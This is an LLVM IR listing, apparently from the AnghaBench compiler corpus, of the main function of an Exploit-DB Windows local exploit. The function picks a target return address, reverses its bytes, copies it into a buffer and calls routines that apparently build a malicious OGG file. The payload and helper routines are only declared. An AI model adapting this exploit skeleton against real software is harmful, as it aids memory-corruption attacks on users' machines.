; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_11174.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_11174.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_2__ = type { i8*, i32 }

@.str = private unnamed_addr constant [4 x i8] c"CLS\00", align 1
@.str.1 = private unnamed_addr constant [5 x i8] c"%s%s\00", align 1
@banner = common dso_local global i8* null, align 8
@arguments = common dso_local global i32 0, align 4
@input = common dso_local global i32 0, align 4
@RET = common dso_local global %struct.TYPE_2__* null, align 8
@bf = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [26 x i8] c"[!]Using : %s retaddress\0A\00", align 1
@b = common dso_local global i32 0, align 4
@OGGfile = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = load i32, i32* %4, align 4
  %7 = icmp slt i32 %6, 2
  br i1 %7, label %8, label %15

8:                                                ; preds = %2
  %9 = call i32 @system(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0))
  %10 = load i8*, i8** @banner, align 8
  %11 = load i32, i32* @arguments, align 4
  %12 = call i32 (i8*, i8*, ...) @printf(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.1, i64 0, i64 0), i8* %10, i32 %11)
  %13 = call i32 (...) @Targetprint()
  %14 = call i32 @exit(i32 0) #3
  unreachable

15:                                               ; preds = %2
  %16 = load i8**, i8*** %5, align 8
  %17 = getelementptr inbounds i8*, i8** %16, i64 1
  %18 = load i8*, i8** %17, align 8
  %19 = call i32 @atoi(i8* %18)
  store i32 %19, i32* @input, align 4
  %20 = load i32, i32* @input, align 4
  switch i32 %20, label %81 [
    i32 0, label %21
    i32 1, label %33
    i32 2, label %45
    i32 3, label %57
    i32 4, label %69
  ]

21:                                               ; preds = %15
  %22 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %23 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %22, i64 0
  %24 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %23, i32 0, i32 1
  %25 = load i32, i32* %24, align 8
  %26 = call i32 @reverseInt(i32 %25)
  %27 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %28 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %27, i64 0
  %29 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %28, i32 0, i32 1
  %30 = load i32, i32* %29, align 8
  %31 = load i32, i32* @bf, align 4
  %32 = call i32 @cpy(i32 %30, i32 %31)
  br label %81

33:                                               ; preds = %15
  %34 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %35 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %34, i64 1
  %36 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %35, i32 0, i32 1
  %37 = load i32, i32* %36, align 8
  %38 = call i32 @reverseInt(i32 %37)
  %39 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %40 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %39, i64 1
  %41 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %40, i32 0, i32 1
  %42 = load i32, i32* %41, align 8
  %43 = load i32, i32* @bf, align 4
  %44 = call i32 @cpy(i32 %42, i32 %43)
  br label %81

45:                                               ; preds = %15
  %46 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %47 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %46, i64 2
  %48 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %47, i32 0, i32 1
  %49 = load i32, i32* %48, align 8
  %50 = call i32 @reverseInt(i32 %49)
  %51 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %52 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %51, i64 2
  %53 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %52, i32 0, i32 1
  %54 = load i32, i32* %53, align 8
  %55 = load i32, i32* @bf, align 4
  %56 = call i32 @cpy(i32 %54, i32 %55)
  br label %81

57:                                               ; preds = %15
  %58 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %59 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %58, i64 3
  %60 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %59, i32 0, i32 1
  %61 = load i32, i32* %60, align 8
  %62 = call i32 @reverseInt(i32 %61)
  %63 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %64 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %63, i64 3
  %65 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %64, i32 0, i32 1
  %66 = load i32, i32* %65, align 8
  %67 = load i32, i32* @bf, align 4
  %68 = call i32 @cpy(i32 %66, i32 %67)
  br label %81

69:                                               ; preds = %15
  %70 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %71 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %70, i64 4
  %72 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %71, i32 0, i32 1
  %73 = load i32, i32* %72, align 8
  %74 = call i32 @reverseInt(i32 %73)
  %75 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %76 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %75, i64 4
  %77 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %76, i32 0, i32 1
  %78 = load i32, i32* %77, align 8
  %79 = load i32, i32* @bf, align 4
  %80 = call i32 @cpy(i32 %78, i32 %79)
  br label %81

81:                                               ; preds = %15, %69, %57, %45, %33, %21
  %82 = load %struct.TYPE_2__*, %struct.TYPE_2__** @RET, align 8
  %83 = load i32, i32* @input, align 4
  %84 = sext i32 %83 to i64
  %85 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %82, i64 %84
  %86 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %85, i32 0, i32 0
  %87 = load i8*, i8** %86, align 8
  %88 = call i32 (i8*, i8*, ...) @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0), i8* %87)
  %89 = load i32, i32* @b, align 4
  %90 = call i32 @buildF(i32 %89)
  %91 = load i32, i32* @OGGfile, align 4
  %92 = call i32 @oggf(i32 %91)
  %93 = call i32 (...) @getchar()
  ret i32 0
}

declare dso_local i32 @system(i8*) #1

declare dso_local i32 @printf(i8*, i8*, ...) #1

declare dso_local i32 @Targetprint(...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @reverseInt(i32) #1

declare dso_local i32 @cpy(i32, i32) #1

declare dso_local i32 @buildF(i32) #1

declare dso_local i32 @oggf(i32) #1

declare dso_local i32 @getchar(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
